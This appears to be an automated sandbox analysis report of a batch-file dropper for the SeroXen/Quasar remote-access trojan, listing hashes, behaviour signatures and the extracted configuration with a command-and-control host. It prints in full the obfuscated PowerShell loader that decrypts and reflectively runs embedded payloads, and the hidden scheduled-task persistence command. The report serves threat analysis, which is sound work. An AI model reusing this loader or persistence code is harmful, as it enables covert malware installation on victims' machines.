Analysis
-
max time kernel
34s -
max time network
57s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
21-05-2024 20:12
Static task
static1
Behavioral task
behavioral1
Sample
$sxr-Uni.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
$sxr-Uni.bat
Resource
win10v2004-20240426-en
General
-
Target
$sxr-Uni.bat
-
Size
1004KB
-
MD5
87135909ef2fbb7168cd05d0e39fa129
-
SHA1
1c2a864813a5cf5fb12a3e92f80c8ea90b5d7799
-
SHA256
38050d3e9a2d09088d05a9a586ad93d139c84439ae995d42cbbaed70fdd77ea7
-
SHA512
93475323429a7084902ba12d8ae8ba006de046dfcce62d7acd219f4ec856e561b3f1b036661a52de1950359a61dc1dd8fc52c8b3ea8e1756be04ae0a071ac547
-
SSDEEP
24576:Aj9+DnG6YVMFMTnd9x6osRvWc2mjJRiW7+wjHRjX:NGppndjT6dxjX
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Extracted
quasar
3.1.5
SeroXen
uk2.localto.net:3362
$Sxr-CHcUwDREE2aL5huOTd
-
encryption_key
8v1KwkaFypjEiZ1Virk0
-
install_name
Client.exe
-
log_directory
$sxr-cmd
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 4 IoCs
Processes:
resource yara_rule behavioral3/memory/2068-22-0x0000000007DA0000-0x0000000007E92000-memory.dmp family_quasar behavioral3/memory/3904-80-0x000000000A3C0000-0x000000000A42C000-memory.dmp family_quasar C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe family_quasar behavioral3/memory/1780-100-0x00000000006C0000-0x000000000072C000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 2068 powershell.exe 3220 powershell.exe 3904 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
$sxr-Uni.exepid process 1780 $sxr-Uni.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wermgr.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
wermgr.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 2068 powershell.exe 2068 powershell.exe 3220 powershell.exe 3220 powershell.exe 3904 powershell.exe 3904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2068 powershell.exe Token: SeDebugPrivilege 3220 powershell.exe Token: SeIncreaseQuotaPrivilege 3220 powershell.exe Token: SeSecurityPrivilege 3220 powershell.exe Token: SeTakeOwnershipPrivilege 3220 powershell.exe Token: SeLoadDriverPrivilege 3220 powershell.exe Token: SeSystemProfilePrivilege 3220 powershell.exe Token: SeSystemtimePrivilege 3220 powershell.exe Token: SeProfSingleProcessPrivilege 3220 powershell.exe Token: SeIncBasePriorityPrivilege 3220 powershell.exe Token: SeCreatePagefilePrivilege 3220 powershell.exe Token: SeBackupPrivilege 3220 powershell.exe Token: SeRestorePrivilege 3220 powershell.exe Token: SeShutdownPrivilege 3220 powershell.exe Token: SeDebugPrivilege 3220 powershell.exe Token: SeSystemEnvironmentPrivilege 3220 powershell.exe Token: SeRemoteShutdownPrivilege 3220 powershell.exe Token: SeUndockPrivilege 3220 powershell.exe Token: SeManageVolumePrivilege 3220 powershell.exe Token: 33 3220 powershell.exe Token: 34 3220 powershell.exe Token: 35 3220 powershell.exe Token: 36 3220 powershell.exe Token: SeIncreaseQuotaPrivilege 3220 powershell.exe Token: SeSecurityPrivilege 3220 powershell.exe Token: SeTakeOwnershipPrivilege 3220 powershell.exe Token: SeLoadDriverPrivilege 3220 powershell.exe Token: SeSystemProfilePrivilege 3220 powershell.exe Token: SeSystemtimePrivilege 3220 powershell.exe Token: SeProfSingleProcessPrivilege 3220 powershell.exe Token: SeIncBasePriorityPrivilege 3220 powershell.exe Token: SeCreatePagefilePrivilege 3220 powershell.exe Token: SeBackupPrivilege 3220 powershell.exe Token: SeRestorePrivilege 3220 powershell.exe Token: SeShutdownPrivilege 3220 powershell.exe Token: SeDebugPrivilege 3220 powershell.exe Token: SeSystemEnvironmentPrivilege 3220 powershell.exe Token: SeRemoteShutdownPrivilege 3220 powershell.exe Token: SeUndockPrivilege 3220 powershell.exe Token: SeManageVolumePrivilege 3220 powershell.exe Token: 33 3220 powershell.exe Token: 34 3220 powershell.exe Token: 35 3220 powershell.exe Token: 36 3220 powershell.exe Token: SeIncreaseQuotaPrivilege 3220 powershell.exe Token: SeSecurityPrivilege 3220 powershell.exe Token: SeTakeOwnershipPrivilege 3220 powershell.exe Token: SeLoadDriverPrivilege 3220 powershell.exe Token: SeSystemProfilePrivilege 3220 powershell.exe Token: SeSystemtimePrivilege 3220 powershell.exe Token: SeProfSingleProcessPrivilege 3220 powershell.exe Token: SeIncBasePriorityPrivilege 3220 powershell.exe Token: SeCreatePagefilePrivilege 3220 powershell.exe Token: SeBackupPrivilege 3220 powershell.exe Token: SeRestorePrivilege 3220 powershell.exe Token: SeShutdownPrivilege 3220 powershell.exe Token: SeDebugPrivilege 3220 powershell.exe Token: SeSystemEnvironmentPrivilege 3220 powershell.exe Token: SeRemoteShutdownPrivilege 3220 powershell.exe Token: SeUndockPrivilege 3220 powershell.exe Token: SeManageVolumePrivilege 3220 powershell.exe Token: 33 3220 powershell.exe Token: 34 3220 powershell.exe Token: 35 3220 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-Uni.exepid process 1780 $sxr-Uni.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 2924 wrote to memory of 2068 2924 cmd.exe powershell.exe PID 2924 wrote to memory of 2068 2924 cmd.exe powershell.exe PID 2924 wrote to memory of 2068 2924 cmd.exe powershell.exe PID 2068 wrote to memory of 3220 2068 powershell.exe powershell.exe PID 2068 wrote to memory of 3220 2068 powershell.exe powershell.exe PID 2068 wrote to memory of 3220 2068 powershell.exe powershell.exe PID 2068 wrote to memory of 2792 2068 powershell.exe WScript.exe PID 2068 wrote to memory of 2792 2068 powershell.exe WScript.exe PID 2068 wrote to memory of 2792 2068 powershell.exe WScript.exe PID 2792 wrote to memory of 3548 2792 WScript.exe cmd.exe PID 2792 wrote to memory of 3548 2792 WScript.exe cmd.exe PID 2792 wrote to memory of 3548 2792 WScript.exe cmd.exe PID 3548 wrote to memory of 3904 3548 cmd.exe powershell.exe PID 3548 wrote to memory of 3904 3548 cmd.exe powershell.exe PID 3548 wrote to memory of 3904 3548 cmd.exe powershell.exe PID 3904 wrote to memory of 1780 3904 powershell.exe $sxr-Uni.exe PID 3904 wrote to memory of 1780 3904 powershell.exe $sxr-Uni.exe PID 3904 wrote to memory of 1780 3904 powershell.exe $sxr-Uni.exe PID 3904 wrote to memory of 1820 3904 powershell.exe wermgr.exe PID 3904 wrote to memory of 1820 3904 powershell.exe wermgr.exe PID 3904 wrote to memory of 1820 3904 powershell.exe wermgr.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZuUSVdDzzqEQUY+YLsQ5Gj5wKfn0tqq012ohBylrVEE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vggS0zw77JyIF8H43aLbbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GZkhM=New-Object System.IO.MemoryStream(,$param_var); $oEEbG=New-Object System.IO.MemoryStream; $cBLwn=New-Object System.IO.Compression.GZipStream($GZkhM, [IO.Compression.CompressionMode]::Decompress); $cBLwn.CopyTo($oEEbG); $cBLwn.Dispose(); $GZkhM.Dispose(); $oEEbG.Dispose(); $oEEbG.ToArray();}function execute_function($param_var,$param2_var){ $YTJuF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BaFCg=$YTJuF.EntryPoint; $BaFCg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat';$pjodI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat').Split([Environment]::NewLine);foreach ($SxOOI in $pjodI) { if ($SxOOI.StartsWith(':: ')) { $tIbAV=$SxOOI.Substring(3); break; }}$payloads_var=[string[]]$tIbAV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_527_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_527.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3220 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_527.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_527.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZuUSVdDzzqEQUY+YLsQ5Gj5wKfn0tqq012ohBylrVEE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vggS0zw77JyIF8H43aLbbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GZkhM=New-Object System.IO.MemoryStream(,$param_var); $oEEbG=New-Object System.IO.MemoryStream; $cBLwn=New-Object System.IO.Compression.GZipStream($GZkhM, [IO.Compression.CompressionMode]::Decompress); $cBLwn.CopyTo($oEEbG); $cBLwn.Dispose(); $GZkhM.Dispose(); $oEEbG.Dispose(); $oEEbG.ToArray();}function execute_function($param_var,$param2_var){ $YTJuF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BaFCg=$YTJuF.EntryPoint; $BaFCg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_527.bat';$pjodI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_527.bat').Split([Environment]::NewLine);foreach ($SxOOI in $pjodI) { if ($SxOOI.StartsWith(':: ')) { $tIbAV=$SxOOI.Substring(3); break; }}$payloads_var=[string[]]$tIbAV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe"C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1780 -
C:\Windows\SysWOW64\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3904" "2652" "2304" "2644" "0" "0" "2660" "0" "0" "0" "0" "0"6⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1820
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD58ba8fc1034d449222856ea8fa2531e28
SHA17570fe1788e57484c5138b6cead052fbc3366f3e
SHA2562e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2
SHA5127ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD581a21dd5ff376076ce4ea5b787889e19
SHA1052c32cc977f28c2ec9aa688c5c6ccf2f68f2a05
SHA256b2d585b1da82cd61833fe0e2cbcfa4cb7a024076a0b2ed7cefbde1b2fa78dfeb
SHA51268c39303934442e30721d3bd23b33050e87c16b5f8365d635c12e516795e557fe56a4a5c2f0f8bfec96339e09052186926b1adc01fa8e0868545333df0336ea7
-
C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exeFilesize
409KB
MD595b900961b79bdde26d9aa9b7dd0d45f
SHA1fa92ee8cb299cb3e7565c4d8fe5071a902e2fd08
SHA256a3c2d3cb1d3aac5f6a85fcc8654d1f36671b4d0d9cb49c8187dc973fdc4637f0
SHA5126cc027d2b156842274fc170d9dc3bf62274fecd06af8cc863d0101e559605cfc162f43fdd2fe2798446d7717b25b244365d96a6891fe7f07d01fc1e8f53bb2ad
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
164KB
MD5bec10290154b8590c20abe2e49096d21
SHA1ac36297e505124cdf3db5f07ee595cb1d95187ea
SHA256a0739bd54451695e2a7861a6845c59079b8a08d4543f883ec63fc3d5ac357107
SHA512583b0e21f13fcbc3b5a02018b30baa8fb0180ff43b7aa8cf21cfde47122cf632d5452b311bcbc2dc1acc6587510a764b01984e9b567bbec9bfadbbb4e76cf97d
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_44ueie3s.2m4.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\startup_str_527.batFilesize
1004KB
MD587135909ef2fbb7168cd05d0e39fa129
SHA11c2a864813a5cf5fb12a3e92f80c8ea90b5d7799
SHA25638050d3e9a2d09088d05a9a586ad93d139c84439ae995d42cbbaed70fdd77ea7
SHA51293475323429a7084902ba12d8ae8ba006de046dfcce62d7acd219f4ec856e561b3f1b036661a52de1950359a61dc1dd8fc52c8b3ea8e1756be04ae0a071ac547
-
C:\Users\Admin\AppData\Roaming\startup_str_527.vbsFilesize
115B
MD5f93163321c00180e32ba98c81eafc0fe
SHA11af209d565d888c3709f25929ee23aece46efde5
SHA256c55cbdee39a9d483cc7a0af0f70fc28dfd853521eeace70bddaa82c8b678d199
SHA5129ced0d257a9fb5f813492abee3926f56dd29073cc0bf8fedb5b86a8206f4934f9a66ac39fb32d5fbe285e3d0d85966727c99dfc8d2c1287fb671ec12e1c835b1
-
memory/1780-111-0x0000000006780000-0x000000000678A000-memory.dmpFilesize
40KB
-
memory/1780-109-0x0000000006400000-0x000000000643C000-memory.dmpFilesize
240KB
-
memory/1780-108-0x0000000005FD0000-0x0000000005FE2000-memory.dmpFilesize
72KB
-
memory/1780-100-0x00000000006C0000-0x000000000072C000-memory.dmpFilesize
432KB
-
memory/2068-18-0x0000000005BC0000-0x0000000005C0C000-memory.dmpFilesize
304KB
-
memory/2068-0-0x000000007523E000-0x000000007523F000-memory.dmpFilesize
4KB
-
memory/2068-20-0x0000000007CB0000-0x0000000007CCA000-memory.dmpFilesize
104KB
-
memory/2068-21-0x0000000007C50000-0x0000000007C58000-memory.dmpFilesize
32KB
-
memory/2068-22-0x0000000007DA0000-0x0000000007E92000-memory.dmpFilesize
968KB
-
memory/2068-23-0x0000000009F60000-0x000000000A506000-memory.dmpFilesize
5.6MB
-
memory/2068-1-0x0000000004780000-0x00000000047B6000-memory.dmpFilesize
216KB
-
memory/2068-3-0x0000000004F20000-0x000000000554A000-memory.dmpFilesize
6.2MB
-
memory/2068-2-0x0000000075230000-0x00000000759E1000-memory.dmpFilesize
7.7MB
-
memory/2068-19-0x0000000008330000-0x00000000089AA000-memory.dmpFilesize
6.5MB
-
memory/2068-4-0x0000000075230000-0x00000000759E1000-memory.dmpFilesize
7.7MB
-
memory/2068-5-0x0000000004D80000-0x0000000004DA2000-memory.dmpFilesize
136KB
-
memory/2068-6-0x0000000005550000-0x00000000055B6000-memory.dmpFilesize
408KB
-
memory/2068-75-0x0000000075230000-0x00000000759E1000-memory.dmpFilesize
7.7MB
-
memory/2068-7-0x00000000055C0000-0x0000000005626000-memory.dmpFilesize
408KB
-
memory/2068-16-0x0000000005630000-0x0000000005987000-memory.dmpFilesize
3.3MB
-
memory/2068-17-0x0000000005B20000-0x0000000005B3E000-memory.dmpFilesize
120KB
-
memory/3220-37-0x0000000071420000-0x000000007146C000-memory.dmpFilesize
304KB
-
memory/3220-36-0x0000000006D90000-0x0000000006DC4000-memory.dmpFilesize
208KB
-
memory/3220-54-0x0000000075230000-0x00000000759E1000-memory.dmpFilesize
7.7MB
-
memory/3220-57-0x0000000075230000-0x00000000759E1000-memory.dmpFilesize
7.7MB
-
memory/3220-52-0x00000000071F0000-0x0000000007286000-memory.dmpFilesize
600KB
-
memory/3220-51-0x0000000006FE0000-0x0000000006FEA000-memory.dmpFilesize
40KB
-
memory/3220-50-0x0000000075230000-0x00000000759E1000-memory.dmpFilesize
7.7MB
-
memory/3220-49-0x0000000075230000-0x00000000759E1000-memory.dmpFilesize
7.7MB
-
memory/3220-48-0x0000000006E20000-0x0000000006EC4000-memory.dmpFilesize
656KB
-
memory/3220-25-0x0000000075230000-0x00000000759E1000-memory.dmpFilesize
7.7MB
-
memory/3220-34-0x0000000075230000-0x00000000759E1000-memory.dmpFilesize
7.7MB
-
memory/3220-47-0x0000000006DF0000-0x0000000006E0E000-memory.dmpFilesize
120KB
-
memory/3220-46-0x0000000075230000-0x00000000759E1000-memory.dmpFilesize
7.7MB
-
memory/3220-53-0x0000000007170000-0x0000000007181000-memory.dmpFilesize
68KB
-
memory/3220-35-0x0000000075230000-0x00000000759E1000-memory.dmpFilesize
7.7MB
-
memory/3904-81-0x000000000A4D0000-0x000000000A562000-memory.dmpFilesize
584KB
-
memory/3904-80-0x000000000A3C0000-0x000000000A42C000-memory.dmpFilesize
432KB